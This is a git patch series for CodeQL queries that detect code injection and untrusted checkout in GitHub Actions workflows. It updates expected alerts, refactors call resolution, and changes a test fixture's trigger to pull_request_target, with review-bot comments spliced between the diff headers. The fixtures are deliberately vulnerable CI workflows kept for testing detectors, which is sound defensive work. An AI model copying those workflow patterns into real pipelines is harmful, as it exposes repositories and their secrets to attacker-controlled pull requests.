@@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -414,10 +414,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml index 1e7558b3bc08..560475dc9384 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -1,7 +1,7 @@ name: assets-test on: - pull_request: + pull_request_target: jobs: check-execution-context: diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4fbfca241261..13637396f90e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -255,7 +255,6 @@ edges | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | 
@@ -273,7 +272,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 181bd5673bc4..81a8c63c8822 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index eb9fcc2418ab..29237c9a544e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -4,9 +4,15 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
|
 | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/test9.yml:11:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
From abd49d5b110a37fcf311586179b0553790eee87f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 12:12:29 +0200
Subject: [PATCH 526/707] Improve privilege workflow detection
---
 ql/lib/codeql/actions/Helper.qll | 16 ----------------
 1 file changed, 16 deletions(-)
diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll
index f6c31a6e8eab..9ac67575b8b3 100644
--- a/ql/lib/codeql/actions/Helper.qll
+++ b/ql/lib/codeql/actions/Helper.qll
@@ -252,26 +252,10 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) {
 )
 }
-predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) {
- exists(ReusableWorkflow rw, ExternalJob caller, Job callee |
- callee = node.getEnclosingJob() and
- rw.getACaller() = caller and
- rw.getAJob() = callee and
- caller.isPrivilegedExternallyTriggerable()
- )
- or
- exists(LocalJob caller |
- caller = node.getEnclosingCompositeAction().getACallerJob() and
- caller.isPrivilegedExternallyTriggerable()
- )
-}
-
 predicate inPrivilegedContext(AstNode node) {
 inPrivilegedCompositeAction(node)
 or
 inPrivilegedExternallyTriggerableJob(node)
- or
- calledByPrivilegedExternallyTriggerableJob(node)
 }
 predicate inNonPrivilegedCompositeAction(AstNode node) {
From 090d22fa7a870430a226ac8faddd210d6f59cab1 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 21:38:42 +0200
Subject: [PATCH 527/707] Add GetRepoRoot helper function
---
 ql/lib/codeql/actions/Helper.qll | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll
index 9ac67575b8b3..0df7b1250199 100644
--- a/ql/lib/codeql/actions/Helper.qll
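Review bot: Removing `calledByPrivilegedExternallyTriggerableJob` from `inPrivilegedContext` narrows what counts as a privileged context — a node inside a reusable-workflow job or a composite action that is reached only through a privileged caller no longer qualifies via this disjunct — yet the commit touches only this file and updates no `.expected` output, so the intended replacement is not shown. If the callee is now meant to inherit its callers' trigger events through `inPrivilegedExternallyTriggerableJob` / `inPrivilegedCompositeAction` (both defined outside the hunk), a comment on the predicate would make that explicit: `// callees of reusable workflows and composite actions inherit privilege from their callers' trigger events; see inPrivilegedCompositeAction`. Because under-approximating privilege here silently drops findings rather than producing noise, a fixture with a composite action invoked only from a `pull_request_target` job that still reports at Critical severity would demonstrate that no false negative was introduced.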
+++ b/ql/lib/codeql/actions/Helper.qll
@@ -298,3 +298,20 @@ string defaultBranchNames() {
 not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and
 result = ["main", "master"]
 }
+
+string getRepoRoot() {
+ exists(Workflow w |
+ w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
+ result =
+ w.getLocation()
+ .getFile()
+ .getRelativePath()
+ .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and
+ // exclude workflow_enum reusable workflows directory root
+ not result.indexOf(".github/reusable_workflows/") > -1
+ or
+ not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
+ not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and
+ result = ""
+ )
+}
From ffbddb10732d33cc934efc1d8dd570664a61e0d2 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 21:40:15 +0200
Subject: [PATCH 528/707] Simplify Callable/call match
---
 ql/lib/codeql/actions/ast/internal/Ast.qll | 55 +++++++++++-----------
 1 file changed, 28 insertions(+), 27 deletions(-)
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index d05174f47878..d1c7718d77b4 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
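Review bot: `getRepoRoot()` is derived from every `Workflow` in the database rather than from the file whose path is being normalised, so a database whose workflows live under more than one root (a monorepo, or vendored repositories carrying their own `.github/workflows`) makes it multi-valued, and every `replaceAll(getRepoRoot(), "")` consumer then yields one candidate path per root. Because this helper feeds call resolution — and with it cross-file taint and privilege propagation — a spurious root can pair a `uses:` in one repository with a same-named action or reusable workflow in another. Keying the predicate on the file, e.g. `string getRepoRoot(File f)` computed from `f.getRelativePath()`, avoids that; at minimum the single-root assumption deserves a comment such as `// assumes one repository root per database; multi-valued otherwise`. Note also that QL's `indexOf` yields every occurrence, so a path containing `/.github/workflows` twice produces two prefixes from the first branch.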
@@ -308,19 +308,22 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction {
 LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() }
 UsesStepImpl getACallerStep() {
- exists(UsesStepImpl caller, string gwf_path, string path |
- // the workflow files may not be rooted in the parent directory of .github/workflows
- // extract the offset so we can remove it from the action path
- gwf_path =
- caller
- .getLocation()
+ exists(DataFlow::CallNode call |
+ call.getCalleeNode() = this and
+ result = call.getCfgNode().getAstNode()
+ )
+ }
+
+ string getResolvedPath() {
+ result =
+ ["", "./"] +
+ this.getLocation()
 .getFile()
 .getRelativePath()
- .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and
- path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and
- caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and
- result = caller
- )
+ .replaceAll(getRepoRoot(), "")
+ .replaceAll("/action.yml", "")
+ .replaceAll("/action.yaml", "")
+ .replaceAll(".github/reusable_workflows/", "")
 }
 private predicate hasExplicitSecretAccess() {
@@ -352,6 +355,8 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction {
 )
 }
+ EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() }
+
 /** Holds if the action is privileged and externally triggerable. */
 predicate isPrivilegedExternallyTriggerable() {
 // the action is externally triggerable
@@ -447,6 +452,16 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl {
 result = call.getCfgNode().getAstNode()
 )
 }
+
+ string getResolvedPath() {
+ result =
+ ["", "./"] +
+ this.getLocation()
+ .getFile()
+ .getRelativePath()
+ .replaceAll(getRepoRoot(), "")
+ .replaceAll(".github/reusable_workflows/", "")
+ }
 }
 class InputsImpl extends AstNodeImpl, TInputsNode {
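Review bot: `getResolvedPath()` strips substrings anywhere in the path — `replaceAll(getRepoRoot(), "")` removes every occurrence of the root, and `.replaceAll("/action.yml", "")` / `.replaceAll("/action.yaml", "")` remove that text wherever it appears — whereas the removed code cut at the first `indexOf(["/action.yml", "/action.yaml"])`. Since this string is what `viableCallable` matches `uses:` targets against, an over-eager strip can either fail to resolve a local action, silently losing interprocedural taint flow, or resolve it to the wrong file. A prefix-based strip after removing the root, e.g. `path.prefix(path.indexOf(["/action.yml", "/action.yaml"]))`, keeps the old semantics, and the two near-identical `getResolvedPath()` bodies here and in `ReusableWorkflowImpl` (third hunk) could share one helper. Both class bodies extend outside the hunks.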
@@ -1229,15 +1244,6 @@ abstract class UsesImpl extends AstNodeImpl {
 }
 }
-/**
- * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step.
- * The capture groups are:
- * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2`
- * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`.
- * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`.
- */
-private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" }
-
 /** A Uses step represents a call to an action that is defined in a GitHub repository. */
 class UsesStepImpl extends StepImpl, UsesImpl {
 YamlScalar u;
@@ -1249,19 +1255,14 @@ class UsesStepImpl extends StepImpl, UsesImpl {
 /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */
 override string getCallee() {
 if u.getValue().indexOf("@") > 0
- then
- result =
- (
- u.getValue().regexpCapture(usesParser(), 1) + "/" +
- u.getValue().regexpCapture(usesParser(), 2)
- ).toLowerCase()
+ then result = u.getValue().prefix(u.getValue().indexOf("@"))
 else result = u.getValue()
 }
 override ScalarValueImpl getCalleeNode() { result.getNode() = u }
 /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */
- override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) }
+ override string getVersion() { result = u.getValue().suffix(u.getValue().indexOf("@") + 1) }
 override string toString() {
 if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step"
From ef549ef79564ece1975a6f8df03208175f93b2e6 Mon Sep 17 00:00:00 2001
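Review bot: The new `getCallee()` drops the `.toLowerCase()` that the regex-based version applied to `owner/repo`, so `uses: Actions/Checkout@v4` now yields `Actions/Checkout` instead of `actions/checkout`; GitHub resolves owner and repository names case-insensitively, and any consumer that compares `getCallee()` against lower-case names (model data for known actions, or the untrusted-checkout and code-injection queries — none visible here) would silently stop matching mixed-case references, which is the kind of gap an attacker-authored workflow can exploit. Restoring the normalisation in place, `then result = u.getValue().prefix(u.getValue().indexOf("@")).toLowerCase()`, would require `viableCallable` to compare case-insensitively as well, since the `.github/reusable_workflows/TestOrg/TestRepo/...` fixture relies on case-preserving paths; otherwise normalise on both sides of each comparison. Separately, `indexOf("@")` in QL is multi-valued, so a reference containing two `@` characters now produces two callee/version pairs where the old `([^/]+)/([^/@]+)@(.+)` regex produced one.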
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 21:41:03 +0200
Subject: [PATCH 529/707] Add Outputs nodes as CFG/DFG nodes
---
 ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
index 1fe4a3e7e1c9..8a6e52309fb2 100644
--- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
@@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos
 rank[i](AstNode child, Location l |
 (
 child = this.(CompositeAction).getAnInput() or
- child = this.(CompositeAction).getAnOutputExpr() or
+ child = this.(CompositeAction).getOutputs() or
 child = this.(CompositeAction).getRuns()
 ) and
 l = child.getLocation()
@@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow {
 rank[i](AstNode child, Location l |
 (
 child = this.(ReusableWorkflow).getAnInput() or
- child = this.(ReusableWorkflow).getAnOutputExpr() or
+ child = this.(ReusableWorkflow).getOutputs() or
 child = this.(ReusableWorkflow).getStrategy() or
 child = this.(ReusableWorkflow).getAJob()
 ) and
@@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs {
 override ControlFlowTree getChildNode(int i) {
 result =
 rank[i](AstNode child, Location l |
- child = super.getOutputExpr(_) and l = child.getLocation()
+ child = super.getAnOutputExpr() and l = child.getLocation()
 |
 child
 order by
From 7c2386bbeea2322424ac0064c2fd0eee7b92bcfe Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 24 Sep 2024 21:42:52 +0200
Subject: [PATCH 530/707] Simplify callable/call matches
---
 .../dataflow/internal/DataFlowPrivate.qll | 45 ++-----------------
 1 file changed, 4 insertions(+), 41 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 529bbc82087d..3226e41ba2ff 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -70,7 +70,7 @@ class DataFlowExpr extends Cfg::Node { }
 /**
- * A call corresponds to a Uses steps where a local action, 3rd party action or a reusable workflow get called
+ * A call corresponds to a Uses steps where a composite action or a reusable workflow get called
 */
 class DataFlowCall instanceof Cfg::Node {
 DataFlowCall() { super.getAstNode() instanceof Uses }
@@ -89,23 +89,6 @@ class DataFlowCall instanceof Cfg::Node {
 Location getLocation() { result = this.(Cfg::Node).getLocation() }
 }
-string getRepoRoot() {
- exists(Workflow w |
- w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
- result =
- w.getLocation()
- .getFile()
- .getRelativePath()
- .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and
- // exclude workflow_enum reusable workflows directory root
- not result.indexOf(".github/reusable_workflows/") > -1
- or
- not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
- not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and
- result = ""
- )
-}
-
 /**
 * A Cfg scope that can be called
 */
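Review bot: The updated doc comment in the first hunk says a call is a Uses step targeting a composite action or a reusable workflow, but the constructor on the context line, `DataFlowCall() { super.getAstNode() instanceof Uses }`, still admits every `Uses` node, including third-party `owner/repo@ref` actions that have no `DataFlowCallable` in the database; the comment should describe that distinction instead of narrowing the stated intent while the code stays broad. Suggested wording: `/** A call is any Uses step (local action, third-party action or reusable workflow); only calls to a composite action or reusable workflow present in the database resolve to a DataFlowCallable via viableCallable. */`. The grammar could also be tidied to `a Uses step ... gets called`. The class body continues outside the first hunk.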
@@ -113,22 +96,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } string getName() { - if this instanceof ReusableWorkflow - then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() // or - else - if this instanceof CompositeAction - then - result = - this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .prefix(this.(CompositeAction) - .getLocation() - .getFile() - .getRelativePath() - .indexOf(["/action.yml", "/action.yaml"])) - else none() + result = this.(ReusableWorkflowImpl).getResolvedPath() or + result = this.(CompositeActionImpl).getResolvedPath() } /** Gets a best-effort total ordering. */ @@ -150,13 +119,7 @@ class NormalReturn extends ReturnKind, TNormalReturn { } /** Gets a viable implementation of the target of the given `Call`. */ -DataFlowCallable viableCallable(DataFlowCall c) { - c.getName() = result.getName() or - c.getName() = result.getName().replaceAll(getRepoRoot(), "") or - // special case for reusable workflows downloaded by the workflow_enum action - c.getName() = - result.getName().replaceAll(getRepoRoot(), "").replaceAll(".github/reusable_workflows/", "") -} +DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } /** * Gets a node that can read the value returned from `call` with return kind From 4fc9e3f0f1df5e091d47c200ae1b653d57a177f5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:10 +0200 Subject: [PATCH 531/707] Add Composite action's outputs as a return node --- ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index fbaf44c282f4..9c05256e2fa0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
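Review bot: `viableCallable` now resolves a call by plain string equality, `c.getName() = result.getName()`, so call resolution is exactly as strict as the two `getResolvedPath()` implementations, neither of which is in this hunk. If, as the name suggests, `DataFlowCall.getName()` is derived from the `uses:` string, note that GitHub treats the owner/repo part case-insensitively and that the `@ref` is ignored here, so a caller written `testorg/testrepo/.github/actions/clone-repo@v1` would not match the `TestOrg/TestRepo/...` copy under `.github/reusable_workflows/` unless `getResolvedPath()` normalizes case, and the cross-callable taint edges the new tests rely on would silently vanish. A cheap hardening is `c.getName().toLowerCase() = result.getName().toLowerCase()` (or normalizing inside both `getResolvedPath()` implementations). Either way, `viableCallable` deserves a doc comment stating that resolution ignores the pinned ref and binds to whatever snapshot is checked out locally, since that is a soundness caveat for any finding that crosses into a downloaded action or workflow.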
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -96,7 +96,10 @@ class ReturnNode extends ExprNode { ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflow s).getOutputs() + ( + exists(ReusableWorkflow w | w.getOutputs() = outputs) or + exists(CompositeAction a | a.getOutputs() = outputs) + ) } ReturnKind getKind() { result = TNormalReturn() } From e8a667fdc6f167209df36cc7d03114c23c58d03e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:31 +0200 Subject: [PATCH 532/707] Add new tests --- .../.github/actions/action5/action.yml | 8 ++ .../.github/actions/clone-repo/action.yaml | 46 +++++++++ .../.github/workflows/reusable-workflow.yml | 95 +++++++++++++++++++ .../workflows/composite-action-caller-3.yml | 1 + .../workflows/composite-action-caller-4.yml | 18 ++++ .../workflows/reusable-workflow-caller-3.yml | 10 ++ 6 files changed, 178 insertions(+) create mode 100644 